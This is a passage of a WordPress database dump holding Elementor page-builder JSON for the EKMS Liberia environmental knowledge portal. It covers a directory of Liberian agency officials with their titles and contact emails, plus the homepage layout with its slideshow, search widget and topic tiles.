\\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"John K. Jallah\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_KT.jpg\",\"id\":2360},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"Kawusu Toure\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jeremiah Sokan Sr<\\/strong><br \\/>Coordinator Climate Change Secretariat, EPA<br \\/><a href=\\\"mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Manager - Compliance and Enforcement, EPA<br \\/>jjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Assistant Manager - Compliance and Enforcement, ESIA, EPA\\nkawumtoure@gmail.com\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6b5064d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0ffa3a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5d6e5e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c31131b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"310af85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"8523c31\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(19844,2902,'_wp_page_template','default'),(19845,2902,'_elementor_edit_mode','builder'),(19846,2902,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"slideshow\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"rgba(255,255,255,0.78)\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5500000000000000444089209850062616169452667236328125},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":2035,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_epa.jpg\"},{\"id\":2036,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home1.jpg\"},{\"id\":2037,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home2.jpg\"},{\"id\":2038,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home3.jpg\"},{\"id\":2039,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_maps.jpg\"}],\"background_slideshow_ken_burns_zoom_direction\":\"out\",\"background_slideshow_slide_transition\":\"slide_left\"},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.04)\",\"padding\":{\"unit\":\"px\",\"top\":\"130\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":65},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25},\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"900\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EKMS provides free and open access to information from key government and partner institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_font_family\":\"Roboto\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1999999999999999555910790149937383830547332763671875,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\",\"search_source\":[\"document\",\"institution\",\"mea_resource\",\"project_resource\",\"related_topic\"]},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Select a Topic\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"reverse_order_tablet\":\"reverse-tablet\",\"reverse_order_mobile\":\"reverse-mobile\",\"hide_mobile\":\"hidden-phone\"},\"elements\":[{\"id\